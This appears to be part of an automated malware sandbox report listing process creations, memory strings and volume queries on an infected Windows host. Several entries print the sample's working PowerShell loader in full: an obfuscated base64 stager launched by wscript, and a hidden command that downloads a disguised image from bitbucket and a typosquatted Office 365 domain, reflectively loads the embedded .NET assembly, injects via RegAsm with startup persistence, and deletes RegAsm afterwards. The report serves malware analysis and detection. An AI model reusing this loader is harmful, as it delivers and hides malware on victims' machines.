C@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@k@ei@eqb0@gu@cw@g@d0@i@@n@gg@d@b0@cc@ow@n@@o@j@bc@hk@d@bl@hm@mg@g@d0@i@@n@h@@cw@6@c8@lw@n@ds@dq@k@cq@b@bm@hm@z@bm@hm@z@bn@c@@pq@g@c@@j@bc@hk@d@bl@hm@i@@r@cq@qgb5@hq@zqbz@di@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bs@gk@bgbr@hm@i@@9@c@@q@@o@cg@j@bs@gy@cwbk@gy@cwbk@gc@i@@r@c@@jwbi@gk@d@bi@hu@ywbr@gu@d@@u@g8@cgbn@c8@zwbm@gg@z@bq@gs@z@bk@c8@agbo@gg@a@bo@gg@a@bo@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@di@lgbq@h@@zw@/@de@mw@3@de@mq@z@cc@kq@s@c@@k@@k@gw@zgbz@gq@zgbz@gq@zw@g@cs@i@@n@g8@zgbp@gm@zq@z@dy@nq@u@gc@aqb0@gg@dqbi@c4@aqbv@c8@mq@v@hq@zqbz@hq@lgbq@h@@zw@n@ck@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $bytes = 'htt'; $bytes2 = 'ps://'; $lfsdfsdg = $bytes +$bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64lengthh = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64lengthh); $endindex = $imagetext.indexof($endflag); $commandbytes = [system.convert]::frombase64string($base64command); $endindex = $imagetext.indexof($endflag); $endindex = $imagetext.indexof($endflag); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $endindex = $imagetext.indexof($endflag); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] ('txt.mapagbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@k@ei@eqb0@gu@cw@g@d0@i@@n@gg@d@b0@cc@ow@n@@o@j@bc@hk@d@bl@hm@mg@g@d0@i@@n@h@@cw@6@c8@lw@n@ds@dq@k@cq@b@bm@hm@z@bm@hm@z@bn@c@@pq@g@c@@j@bc@hk@d@bl@hm@i@@r@cq@qgb5@hq@zqbz@di@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bs@gk@bgbr@hm@i@@9@c@@q@@o@cg@j@bs@gy@cwbk@gy@cwbk@gc@i@@r@c@@jwbi@gk@d@bi@hu@ywbr@gu@d@@u@g8@cgbn@c8@zwbm@gg@z@bq@gs@z@bk@c8@agbo@gg@a@bo@gg@a@bo@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@di@lgbq@h@@zw@/@de@mw@3@de@mq@z@cc@kq@s@c@@k@@k@gw@zgbz@gq@zgbz@gq@zw@g@cs@i@@n@g8@zgbp@gm@zq@z@dy@nq@u@gc@aqb0@gg@dqbi@c4@aqbv@c8@mq@v@hq@zqbz@hq@lgbq@h@@zw@n@ck@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@h Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $bytes = 'htt'; $bytes2 = 'ps://'; $lfsdfsdg = $bytes +$bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64lengthh = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64lengthh); $endindex = $imagetext.indexof($endflag); $commandbytes = [system.convert]::frombase64string($base64command); $endindex = $imagetext.indexof($endflag); $endindex = $imagetext.indexof($endflag); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $endindex = $imagetext.indexof($endflag); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] ('txt.mapagbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec Jump to behavior
Source: explorer.exe, 00000007.00000000.1516744787.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2655281517.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: explorer.exe, 00000007.00000000.1523845606.0000000009C28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009C28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009C28000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd}
Source: explorer.exe, 00000007.00000000.1519060398.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1516744787.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2655281517.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.1516744787.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2655281517.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.1516744787.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2655281517.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000002.2654770366.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1516382431.00000000012E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman.
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
